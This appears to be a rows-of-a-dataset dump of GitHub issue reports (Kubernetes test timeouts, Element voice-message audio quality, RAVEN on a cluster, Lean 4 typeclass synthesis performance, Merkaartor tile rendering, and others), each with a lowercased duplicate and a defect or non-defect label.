Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #27479 #27675 #28097 #30571
Previous issues for this suite: #26743 #27118 #27320
|
non_defect
|
kubernetes gce serial broken test run multiple broken tests failed schedulerpredicates validates that nodeaffinity is respected if not matching kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed schedulerpredicates validates that embedding the json podaffinity and podantiaffinity setting as a string in the annotation value work kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go failed daemon set should run and stop complex daemon with node affinity kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed schedulerpredicates validates that interpodantiaffinity is respected if matching kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed horizontal pod autoscaling scale resource cpu deployment should scale from pods to pods and from to kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed nodes network when a node becomes unreachable all pods on the unreachable node should be marked as notready upon the node turn notready and all pods should be mark back to ready when the node get back to ready before pod eviction timeout kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed schedulerpredicates validates that interpod affinity and antiaffinity is respected if matching kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go failed schedulerpredicates validates that interpodaffinity is respected if matching with multiple affinities kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go failed namespaces should ensure that all pods are removed when a namespace is deleted kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go failed daemonrestart controller manager should not create delete replicas across restart kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go failed daemonrestart kubelet should not restart containers across restart kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed horizontal pod autoscaling scale resource cpu deployment should scale from pod to pods and from to kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed nodes network when a node becomes unreachable recreates pods scheduled on the unreachable node and allows scheduling of pods on a node after it rejoins the cluster kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed etcd failure should recover from sigkill kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed kubelet regular resource usage tracking resource tracking for pods per node kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed schedulerpredicates validates that a pod with an invalid podaffinity is rejected because of the labelselectorrequirement is invalid kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go failed kubelet regular resource usage tracking resource tracking for pods per node kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go aug all nodes should be ready after test get dial tcp i o timeout go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed etcd failure should recover from network partition with master kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed rescheduler should ensure that critical pod is scheduled in case there is no resources available kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed schedulerpredicates validates that inter pod affinity is respected if not matching kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go failed nodes resize should be able to add nodes kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed daemon set should run and stop complex daemon kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go failed schedulerpredicates validates resource limits of pods that are allowed to run kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed restart should restart all nodes and ensure all nodes and pods recover kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically failed horizontal pod autoscaling scale resource cpu replicationcontroller should scale from pod to pods and from to and verify decision stability kubernetes suite go src io kubernetes output dockerized go src io kubernetes test framework framework go expected error s timed out waiting for the condition timed out waiting for the condition not to have occurred go src io kubernetes output dockerized go src io kubernetes test framework framework go issues about this test specifically previous issues for this suite
| 0
|
220,547
| 16,963,472,621
|
IssuesEvent
|
2021-06-29 08:04:23
|
srijan-sivakumar/redant
|
https://api.github.com/repos/srijan-sivakumar/redant
|
closed
|
Add supported distro details
|
bug documentation
|
It is required to mentioned on what all distros redant has been tested ( redant control machine as well as the server and client distros ).
|
1.0
|
Add supported distro details - It is required to mentioned on what all distros redant has been tested ( redant control machine as well as the server and client distros ).
|
non_defect
|
add supported distro details it is required to mentioned on what all distros redant has been tested redant control machine as well as the server and client distros
| 0
|
77,236
| 26,871,053,758
|
IssuesEvent
|
2023-02-04 13:17:27
|
vector-im/element-web
|
https://api.github.com/repos/vector-im/element-web
|
opened
|
Has the Voice Message codec or processing changed recently ?
|
T-Defect
|
### Steps to reproduce
1. On the web app in a conversation (I only have bridged conversations with bots)
2. I start recording a voice message
3. It records alright and send itself
### Outcome
#### What did you expect?
I think I remember not long ago but the sound seemed almost uncompressed with no major artifacts, this is what I would expect.
#### What happened instead?
The audio is seriously lacking bass and is often getting major artifacts that completely distort the voice, especially when there's a bit of background noise. It seems that there's some sort of noise removal activated, that wasn't here before or maybe I didn't notice but I doubt that.
Is there a way to choose the codec settings for the voice messages, especially the processing part ? At least to remove the noise reduction. I use a professional headset processed in a professional mixer with standard broadcast/radio tools, with monitoring activated. This is not an issue on the input audio side.
### Operating system
Windows 11 22H2
### Browser information
Rambox 2.0.10 so Electron/Chromium but not sure where to find the Version
### URL for webapp
Private server
### Application version
Element version: 1.11.20 Olm version: 3.2.12
### Homeserver
Synapse 1.76.0 (pretty sure)
### Will you send logs?
Yes
|
1.0
|
Has the Voice Message codec or processing changed recently ? - ### Steps to reproduce
1. On the web app in a conversation (I only have bridged conversations with bots)
2. I start recording a voice message
3. It records alright and send itself
### Outcome
#### What did you expect?
I think I remember not long ago but the sound seemed almost uncompressed with no major artifacts, this is what I would expect.
#### What happened instead?
The audio is seriously lacking bass and is often getting major artifacts that completely distort the voice, especially when there's a bit of background noise. It seems that there's some sort of noise removal activated, that wasn't here before or maybe I didn't notice but I doubt that.
Is there a way to choose the codec settings for the voice messages, especially the processing part ? At least to remove the noise reduction. I use a professional headset processed in a professional mixer with standard broadcast/radio tools, with monitoring activated. This is not an issue on the input audio side.
### Operating system
Windows 11 22H2
### Browser information
Rambox 2.0.10 so Electron/Chromium but not sure where to find the Version
### URL for webapp
Private server
### Application version
Element version: 1.11.20 Olm version: 3.2.12
### Homeserver
Synapse 1.76.0 (pretty sure)
### Will you send logs?
Yes
|
defect
|
has the voice message codec or processing changed recently steps to reproduce on the web app in a conversation i only have bridged conversations with bots i start recording a voice message it records alright and send itself outcome what did you expect i think i remember not long ago but the sound seemed almost uncompressed with no major artifacts this is what i would expect what happened instead the audio is seriously lacking bass and is often getting major artifacts that completely distort the voice especially when there s a bit of background noise it seems that there s some sort of noise removal activated that wasn t here before or maybe i didn t notice but i doubt that is there a way to choose the codec settings for the voice messages especially the processing part at least to remove the noise reduction i use a professional headset processed in a professional mixer with standard broadcast radio tools with monitoring activated this is not an issue on the input audio side operating system windows browser information rambox so electron chromium but not sure where to find the version url for webapp private server application version element version olm version homeserver synapse pretty sure will you send logs yes
| 1
|
8,181
| 2,611,469,717
|
IssuesEvent
|
2015-02-27 05:14:55
|
chrsmith/hedgewars
|
https://api.github.com/repos/chrsmith/hedgewars
|
closed
|
Crash app in remote mode
|
auto-migrated Priority-Medium Type-Defect
|
```
What steps will reproduce the problem?
1. clic in network
2. clic in start server
3. crash
What is the expected output? What do you see instead?
What version of the product are you using? On what operating system?
Please provide any additional information below.
```
Original issue reported on code.google.com by `esteban....@gmail.com` on 2 Feb 2011 at 5:20
* Merged into: #180
|
1.0
|
Crash app in remote mode - ```
What steps will reproduce the problem?
1. clic in network
2. clic in start server
3. crash
What is the expected output? What do you see instead?
What version of the product are you using? On what operating system?
Please provide any additional information below.
```
Original issue reported on code.google.com by `esteban....@gmail.com` on 2 Feb 2011 at 5:20
* Merged into: #180
|
defect
|
crash app in remote mode what steps will reproduce the problem clic in network clic in start server crash what is the expected output what do you see instead what version of the product are you using on what operating system please provide any additional information below original issue reported on code google com by esteban gmail com on feb at merged into
| 1
|
28,004
| 22,744,783,567
|
IssuesEvent
|
2022-07-07 08:13:13
|
superlistapp/super_editor
|
https://api.github.com/repos/superlistapp/super_editor
|
closed
|
Add category filters to logger
|
type_enhancement area_infrastructure status_needs_analysis
|
The current logging solution doesn't work well because we get all or nothing.
Implement a robust logging solution.
|
1.0
|
Add category filters to logger - The current logging solution doesn't work well because we get all or nothing.
Implement a robust logging solution.
|
non_defect
|
add category filters to logger the current logging solution doesn t work well because we get all or nothing implement a robust logging solution
| 0
|
38,254
| 8,710,950,527
|
IssuesEvent
|
2018-12-06 17:46:20
|
idaholab/raven
|
https://api.github.com/repos/idaholab/raven
|
opened
|
Fix raven on cluster.
|
defect priority_minor
|
--------
Issue Description
--------
##### What did you expect to see happen?
Raven to work on the cluster.
##### What did you see instead?
It fails, and it is my fault for adding matplotlib to conda-forge.
##### Do you have a suggested fix for the development team?
Add matplotlib to conda-forge only for python 3.
##### Please attach the input file(s) that generate this error. The simpler the input, the faster we can find the issue.
```./run_tests -j3 --re=InternalParallelTests```
----------------
For Change Control Board: Issue Review
----------------
This review should occur before any development is performed as a response to this issue.
- [x] 1. Is it tagged with a type: defect or task?
- [x] 2. Is it tagged with a priority: critical, normal or minor?
- [x] 3. If it will impact requirements or requirements tests, is it tagged with requirements?
- [x] 4. If it is a defect, can it cause wrong results for users? If so an email needs to be sent to the users. (No, just causes fails in parallel python on the cluster)
- [x] 5. Is a rationale provided? (Such as explaining why the improvement is needed or why current code is wrong.)
-------
For Change Control Board: Issue Closure
-------
This review should occur when the issue is imminently going to be closed.
- [ ] 1. If the issue is a defect, is the defect fixed?
- [ ] 2. If the issue is a defect, is the defect tested for in the regression test system? (If not explain why not.)
- [ ] 3. If the issue can impact users, has an email to the users group been written (the email should specify if the defect impacts stable or master)?
- [ ] 4. If the issue is a defect, does it impact the latest release branch? If yes, is there any issue tagged with release (create if needed)?
- [ ] 5. If the issue is being closed without a pull request, has an explanation of why it is being closed been provided?
|
1.0
|
Fix raven on cluster. - --------
Issue Description
--------
##### What did you expect to see happen?
Raven to work on the cluster.
##### What did you see instead?
It fails, and it is my fault for adding matplotlib to conda-forge.
##### Do you have a suggested fix for the development team?
Add matplotlib to conda-forge only for python 3.
##### Please attach the input file(s) that generate this error. The simpler the input, the faster we can find the issue.
```./run_tests -j3 --re=InternalParallelTests```
----------------
For Change Control Board: Issue Review
----------------
This review should occur before any development is performed as a response to this issue.
- [x] 1. Is it tagged with a type: defect or task?
- [x] 2. Is it tagged with a priority: critical, normal or minor?
- [x] 3. If it will impact requirements or requirements tests, is it tagged with requirements?
- [x] 4. If it is a defect, can it cause wrong results for users? If so an email needs to be sent to the users. (No, just causes fails in parallel python on the cluster)
- [x] 5. Is a rationale provided? (Such as explaining why the improvement is needed or why current code is wrong.)
-------
For Change Control Board: Issue Closure
-------
This review should occur when the issue is imminently going to be closed.
- [ ] 1. If the issue is a defect, is the defect fixed?
- [ ] 2. If the issue is a defect, is the defect tested for in the regression test system? (If not explain why not.)
- [ ] 3. If the issue can impact users, has an email to the users group been written (the email should specify if the defect impacts stable or master)?
- [ ] 4. If the issue is a defect, does it impact the latest release branch? If yes, is there any issue tagged with release (create if needed)?
- [ ] 5. If the issue is being closed without a pull request, has an explanation of why it is being closed been provided?
|
defect
|
fix raven on cluster issue description what did you expect to see happen raven to work on the cluster what did you see instead it fails and it is my fault for adding matplotlib to conda forge do you have a suggested fix for the development team add matplotlib to conda forge only for python please attach the input file s that generate this error the simpler the input the faster we can find the issue run tests re internalparalleltests for change control board issue review this review should occur before any development is performed as a response to this issue is it tagged with a type defect or task is it tagged with a priority critical normal or minor if it will impact requirements or requirements tests is it tagged with requirements if it is a defect can it cause wrong results for users if so an email needs to be sent to the users no just causes fails in parallel python on the cluster is a rationale provided such as explaining why the improvement is needed or why current code is wrong for change control board issue closure this review should occur when the issue is imminently going to be closed if the issue is a defect is the defect fixed if the issue is a defect is the defect tested for in the regression test system if not explain why not if the issue can impact users has an email to the users group been written the email should specify if the defect impacts stable or master if the issue is a defect does it impact the latest release branch if yes is there any issue tagged with release create if needed if the issue is being closed without a pull request has an explanation of why it is being closed been provided
| 1
|
179,175
| 14,693,245,250
|
IssuesEvent
|
2021-01-03 07:48:18
|
dankamongmen/notcurses
|
https://api.github.com/repos/dankamongmen/notcurses
|
closed
|
update notcurses.3 to include piles
|
bug documentation
|
As of 2.1.2+, the `notcurses.3` library summary man page doesn't mention piles, despite running through the remaining Notcurses model. Update it to include this, and redo the `THREADING` section to reflect it.
Honestly, we could probably spend a few hours very profitably going over all the man pages.
|
1.0
|
update notcurses.3 to include piles - As of 2.1.2+, the `notcurses.3` library summary man page doesn't mention piles, despite running through the remaining Notcurses model. Update it to include this, and redo the `THREADING` section to reflect it.
Honestly, we could probably spend a few hours very profitably going over all the man pages.
|
non_defect
|
update notcurses to include piles as of the notcurses library summary man page doesn t mention piles despite running through the remaining notcurses model update it to include this and redo the threading section to reflect it honestly we could probably spend a few hours very profitably going over all the man pages
| 0
|
61,044
| 17,023,586,799
|
IssuesEvent
|
2021-07-03 02:47:41
|
tomhughes/trac-tickets
|
https://api.github.com/repos/tomhughes/trac-tickets
|
closed
|
Display problems when loading tiles
|
Component: merkaartor Priority: minor Resolution: fixed Type: defect
|
**[Submitted to the original trac issue database at 5.55pm, Saturday, 8th May 2010]**
This bug was originally reported via launchpad:
https://bugs.launchpad.net/ubuntu/+source/merkaartor/+bug/575127
"OS: Ubuntu 10.04 64bits.
When loading new tiles (zooming or moving the map), strange red grids and tiles parts appear, melted. Sometimes, no map is shown even when all tiles are loaded.
As in ubuntu 9.10 64bits, maps tiles should load smoothly without display bugs."
The launchpad report also provides a video.
http://launchpadlibrarian.net/47857800/merkaartor_display_problem-1.ogv
Ubuntu 10.04 bundles 0.14+svnfixes~20090912-2build1. 9.10 seems to have used 0.13.2.
https://code.launchpad.net/~ubuntu-branches/ubuntu/karmic/merkaartor/karmic
I also saw/see this behavior in all svn/git revisions for several months -- even
under Ubuntu 9.10 64bits. If the original reporter did not see this behaviour with
9.10 he was probably using 0.13.2.
A workaround for me is to enable "Show downloaded areas". As this forces merkaartor to
initialize the whole viewport somehow I could imagine that the bug is related to how
qt issues its paint commands to the xorg / xorg driver (intel 82G965 in my case).
But in the video "Show downloaded areas" seems to be enabled and the bug still occurs.
|
1.0
|
Display problems when loading tiles - **[Submitted to the original trac issue database at 5.55pm, Saturday, 8th May 2010]**
This bug was originally reported via launchpad:
https://bugs.launchpad.net/ubuntu/+source/merkaartor/+bug/575127
"OS: Ubuntu 10.04 64bits.
When loading new tiles (zooming or moving the map), strange red grids and tiles parts appear, melted. Sometimes, no map is shown even when all tiles are loaded.
As in ubuntu 9.10 64bits, maps tiles should load smoothly without display bugs."
The launchpad report also provides a video.
http://launchpadlibrarian.net/47857800/merkaartor_display_problem-1.ogv
Ubuntu 10.04 bundles 0.14+svnfixes~20090912-2build1. 9.10 seems to have used 0.13.2.
https://code.launchpad.net/~ubuntu-branches/ubuntu/karmic/merkaartor/karmic
I also saw/see this behavior in all svn/git revisions for several months -- even
under Ubuntu 9.10 64bits. If the original reporter did not see this behaviour with
9.10 he was probably using 0.13.2.
A workaround for me is to enable "Show downloaded areas". As this forces merkaartor to
initialize the whole viewport somehow I could imagine that the bug is related to how
qt issues its paint commands to the xorg / xorg driver (intel 82G965 in my case).
But in the video "Show downloaded areas" seems to be enabled and the bug still occurs.
|
defect
|
display problems when loading tiles this bug was originally reported via launchpad os ubuntu when loading new tiles zooming or moving the map strange red grids and tiles parts appear melted sometimes no map is shown even when all tiles are loaded as in ubuntu maps tiles should load smoothly without display bugs the launchpad report also provides a video ubuntu bundles svnfixes seems to have used i also saw see this behavior in all svn git revisions for several months even under ubuntu if the original reporter did not see this behaviour with he was probably using a workaround for me is to enable show downloaded areas as this forces merkaartor to initialize the whole viewport somehow i could imagine that the bug is related to how qt issues its paint commands to the xorg xorg driver intel in my case but in the video show downloaded areas seems to be enabled and the bug still occurs
| 1
|
1,194
| 2,601,756,800
|
IssuesEvent
|
2015-02-24 00:33:21
|
chrsmith/bwapi
|
https://api.github.com/repos/chrsmith/bwapi
|
closed
|
Fix Unit::getUpgradeLevel for BWAPI Client
|
auto-migrated Priority-Medium Type-Defect
|
```
Never got around to implementing this correctly when making the initial
implementation of BWAPI Client. It currently incorrectly returns 0 for enemy
units when complete map info is disabled since Player::getUpgradeLevel returns
0 for enemy units when complete map info is disabled.
```
-----
Original issue reported on code.google.com by `lowerlo...@gmail.com` on 22 Oct 2010 at 4:29
|
1.0
|
Fix Unit::getUpgradeLevel for BWAPI Client - ```
Never got around to implementing this correctly when making the initial
implementation of BWAPI Client. It currently incorrectly returns 0 for enemy
units when complete map info is disabled since Player::getUpgradeLevel returns
0 for enemy units when complete map info is disabled.
```
-----
Original issue reported on code.google.com by `lowerlo...@gmail.com` on 22 Oct 2010 at 4:29
|
defect
|
fix unit getupgradelevel for bwapi client never got around to implementing this correctly when making the initial implementation of bwapi client it currently incorrectly returns for enemy units when complete map info is disabled since player getupgradelevel returns for enemy units when complete map info is disabled original issue reported on code google com by lowerlo gmail com on oct at
| 1
|
11,486
| 7,261,653,265
|
IssuesEvent
|
2018-02-18 22:51:02
|
trailofbits/deepstate
|
https://api.github.com/repos/trailofbits/deepstate
|
opened
|
Describe features and benefits in Readme
|
usability
|
[Algo](https://github.com/trailofbits/algo) does this well. Before jumping into the building and installation instructions, we should be describing why someone would want to use DeepState and what specific features it provides.
|
True
|
Describe features and benefits in Readme - [Algo](https://github.com/trailofbits/algo) does this well. Before jumping into the building and installation instructions, we should be describing why someone would want to use DeepState and what specific features it provides.
|
non_defect
|
describe features and benefits in readme does this well before jumping into the building and installation instructions we should be describing why someone would want to use deepstate and what specific features it provides
| 0
|
53,212
| 28,026,451,670
|
IssuesEvent
|
2023-03-28 09:26:38
|
leanprover/lean4
|
https://api.github.com/repos/leanprover/lean4
|
closed
|
TC synthesis of types with mvars should be optimized
|
performance
|
I'm observing traces such as
```
[Meta.synthInstance] [0.127923s] ✅ CoeFun (?m.9005 →+* ?m.9005[X]) fun x => ?m.9005 → ?m.9005[X]
[Meta.synthInstance] [0.000018s] new goal CoeFun (?m.9005 →+* ?m.9005[X]) _tc.0
[Meta.synthInstance.instances] #[@FunLike.hasCoeToFun]
[Meta.synthInstance] [0.000327s] ✅ apply @FunLike.hasCoeToFun to CoeFun (?m.9005 →+* ?m.9005[X]) fun x =>
(a : ?m.9090) → ?m.9091 a
[Meta.synthInstance.tryResolve] [0.000238s] ✅ CoeFun (?m.9005 →+* ?m.9005[X]) fun x =>
(a : ?m.9090) → ?m.9091 a ≟ CoeFun (?m.9005 →+* ?m.9005[X]) fun x => (a : ?m.9090) → ?m.9091 a
[Meta.synthInstance] [0.000039s] new goal FunLike (?m.9005 →+* ?m.9005[X]) _tc.2 _tc.3
[Meta.synthInstance.instances] #[@EmbeddingLike.toFunLike, @ZeroHomClass.toFunLike, @AddHomClass.toFunLike, @OneHomClass.toFunLike, @MulHomClass.toFunLike, @RelHomClass.toFunLike, @SMulHomClass.toFunLike, @StarHomClass.toFunLike, @NonnegHomClass.toFunLike, @SubadditiveHomClass.toFunLike, @SubmultiplicativeHomClass.toFunLike, @MulLEAddHomClass.toFunLike, @NonarchimedeanHomClass.toFunLike, @TopHomClass.toFunLike, @BotHomClass.toFunLike, @SupHomClass.toFunLike, @InfHomClass.toFunLike, @SupₛHomClass.toFunLike, @InfₛHomClass.toFunLike]
[Meta.synthInstance] [0.000087s] 💥 CompleteLattice ?m.29914
[Meta.synthInstance] [0.000032s] new goal CompleteLattice ?m.29914
[Meta.synthInstance.instances] #[@CompleteLinearOrder.toCompleteLattice, @Order.Frame.toCompleteLattice, @Order.Coframe.toCompleteLattice, Prop.completeLattice, @Pi.completeLattice, @AddCon.instCompleteLatticeCon, @Submodule.completeLattice, @WithBot.WithTop.completeLattice, @fixedPoints.completeLattice, @Subgroup.instCompleteLatticeSubgroup, @Setoid.co
mpleteLattice, @AddSubmonoid.instCompleteLatticeAddSubmonoid, @Subsemiring.instCompleteLatticeSubsemiring, @AddSubgroup.instCompleteLatticeAddSubgroup, @Subring.instCompleteLatticeSubring, @Subsemigroup.instCompleteLatticeSubsemigroup, @AddSubsemigroup.instCompleteLatticeSubsemigroup, @Con.instCompleteLatticeCon, OrderDual.completeLattice, @Algebra.instCompleteLa
tticeSubalgebra, Prod.completeLattice, @OrderHom.instCompleteLatticeOrderHomToPreorderToPartialOrderToCompleteSemilatticeInf, @Submonoid.instCompleteLatticeSubmonoid, @WithTop.WithBot.completeLattice]
[Meta.synthInstance] [0.000037s] 💥 apply @WithTop.WithBot.completeLattice to CompleteLattice ?m.29914
[Meta.synthInstance.tryResolve] [0.000020s] 💥 CompleteLattice
?m.29914 ≟ CompleteLattice (WithTop (WithBot ?m.29960))
[Meta.synthInstance] [0.000076s] 💥 CompleteLattice ?m.29914
[Meta.synthInstance] [0.000029s] new goal CompleteLattice ?m.29914
[Meta.synthInstance.instances] #[@CompleteLinearOrder.toCompleteLattice, @Order.Frame.toCompleteLattice, @Order.Coframe.toCompleteLattice, Prop.completeLattice, @Pi.completeLattice, @AddCon.instCompleteLatticeCon, @Submodule.completeLattice, @WithBot.WithTop.completeLattice, @fixedPoints.completeLattice, @Subgroup.instCompleteLatticeSubgroup, @Setoid.co
mpleteLattice, @AddSubmonoid.instCompleteLatticeAddSubmonoid, @Subsemiring.instCompleteLatticeSubsemiring, @AddSubgroup.instCompleteLatticeAddSubgroup, @Subring.instCompleteLatticeSubring, @Subsemigroup.instCompleteLatticeSubsemigroup, @AddSubsemigroup.instCompleteLatticeSubsemigroup, @Con.instCompleteLatticeCon, OrderDual.completeLattice, @Algebra.instCompleteLa
tticeSubalgebra, Prod.completeLattice, @OrderHom.instCompleteLatticeOrderHomToPreorderToPartialOrderToCompleteSemilatticeInf, @Submonoid.instCompleteLatticeSubmonoid, @WithTop.WithBot.completeLattice]
[Meta.synthInstance] [0.000031s] 💥 apply @WithTop.WithBot.completeLattice to CompleteLattice ?m.29914
[Meta.synthInstance.tryResolve] [0.000014s] 💥 CompleteLattice
?m.29914 ≟ CompleteLattice (WithTop (WithBot ?m.29992))
[Meta.synthInstance] [0.000081s] 💥 CompleteLattice ?m.29915
[Meta.synthInstance] [0.000026s] new goal CompleteLattice ?m.29915
[Meta.synthInstance.instances] #[@CompleteLinearOrder.toCompleteLattice, @Order.Frame.toCompleteLattice, @Order.Coframe.toCompleteLattice, Prop.completeLattice, @Pi.completeLattice, @AddCon.instCompleteLatticeCon, @Submodule.completeLattice, @WithBot.WithTop.completeLattice, @fixedPoints.completeLattice, @Subgroup.instCompleteLatticeSubgroup, @Setoid.co
mpleteLattice, @AddSubmonoid.instCompleteLatticeAddSubmonoid, @Subsemiring.instCompleteLatticeSubsemiring, @AddSubgroup.instCompleteLatticeAddSubgroup, @Subring.instCompleteLatticeSubring, @Subsemigroup.instCompleteLatticeSubsemigroup, @AddSubsemigroup.instCompleteLatticeSubsemigroup, @Con.instCompleteLatticeCon, OrderDual.completeLattice, @Algebra.instCompleteLa
tticeSubalgebra, Prod.completeLattice, @OrderHom.instCompleteLatticeOrderHomToPreorderToPartialOrderToCompleteSemilatticeInf, @Submonoid.instCompleteLatticeSubmonoid, @WithTop.WithBot.completeLattice]
[Meta.synthInstance] [0.000038s] 💥 apply @WithTop.WithBot.completeLattice to CompleteLattice ?m.29915
[Meta.synthInstance.tryResolve] [0.000021s] 💥 CompleteLattice
?m.29915 ≟ CompleteLattice (WithTop (WithBot ?m.30023))
[Meta.synthInstance] [0.000073s] 💥 CompleteLattice ?m.29915
[Meta.synthInstance] [0.000027s] new goal CompleteLattice ?m.29915
[Meta.synthInstance.instances] #[@CompleteLinearOrder.toCompleteLattice, @Order.Frame.toCompleteLattice, @Order.Coframe.toCompleteLattice, Prop.completeLattice, @Pi.completeLattice, @AddCon.instCompleteLatticeCon, @Submodule.completeLattice, @WithBot.WithTop.completeLattice, @fixedPoints.completeLattice, @Subgroup.instCompleteLatticeSubgroup, @Setoid.co
mpleteLattice, @AddSubmonoid.instCompleteLatticeAddSubmonoid, @Subsemiring.instCompleteLatticeSubsemiring, @AddSubgroup.instCompleteLatticeAddSubgroup, @Subring.instCompleteLatticeSubring, @Subsemigroup.instCompleteLatticeSubsemigroup, @AddSubsemigroup.instCompleteLatticeSubsemigroup, @Con.instCompleteLatticeCon, OrderDual.completeLattice, @Algebra.instCompleteLa
tticeSubalgebra, Prod.completeLattice, @OrderHom.instCompleteLatticeOrderHomToPreorderToPartialOrderToCompleteSemilatticeInf, @Submonoid.instCompleteLatticeSubmonoid, @WithTop.WithBot.completeLattice]
[Meta.synthInstance] [0.000030s] 💥 apply @WithTop.WithBot.completeLattice to CompleteLattice ?m.29915
[Meta.synthInstance.tryResolve] [0.000014s] 💥 CompleteLattice
?m.29915 ≟ CompleteLattice (WithTop (WithBot ?m.30055))
... <many more bombs>
```
I'm assuming the fact that we try to apply instances that we should know will fail is due to
https://github.com/leanprover/lean4/blob/9bc6fa1c6ef2ad7056adb113350c955e5d516bc5/src/Lean/Meta/DiscrTree.lean#L425-L439
It should probably be possible to have the discrimination tree return a flag expressing that some instances were omitted because of read-only mvars and then throw the stuck exception when no other instance applies instead of returning and trying them all.
|
True
|
TC synthesis of types with mvars should be optimized - I'm observing traces such as
```
[Meta.synthInstance] [0.127923s] ✅ CoeFun (?m.9005 →+* ?m.9005[X]) fun x => ?m.9005 → ?m.9005[X]
[Meta.synthInstance] [0.000018s] new goal CoeFun (?m.9005 →+* ?m.9005[X]) _tc.0
[Meta.synthInstance.instances] #[@FunLike.hasCoeToFun]
[Meta.synthInstance] [0.000327s] ✅ apply @FunLike.hasCoeToFun to CoeFun (?m.9005 →+* ?m.9005[X]) fun x =>
(a : ?m.9090) → ?m.9091 a
[Meta.synthInstance.tryResolve] [0.000238s] ✅ CoeFun (?m.9005 →+* ?m.9005[X]) fun x =>
(a : ?m.9090) → ?m.9091 a ≟ CoeFun (?m.9005 →+* ?m.9005[X]) fun x => (a : ?m.9090) → ?m.9091 a
[Meta.synthInstance] [0.000039s] new goal FunLike (?m.9005 →+* ?m.9005[X]) _tc.2 _tc.3
[Meta.synthInstance.instances] #[@EmbeddingLike.toFunLike, @ZeroHomClass.toFunLike, @AddHomClass.toFunLike, @OneHomClass.toFunLike, @MulHomClass.toFunLike, @RelHomClass.toFunLike, @SMulHomClass.toFunLike, @StarHomClass.toFunLike, @NonnegHomClass.toFunLike, @SubadditiveHomClass.toFunLike, @SubmultiplicativeHomClass.toFunLike, @MulLEAddHomClass.toFunLike, @NonarchimedeanHomClass.toFunLike, @TopHomClass.toFunLike, @BotHomClass.toFunLike, @SupHomClass.toFunLike, @InfHomClass.toFunLike, @SupₛHomClass.toFunLike, @InfₛHomClass.toFunLike]
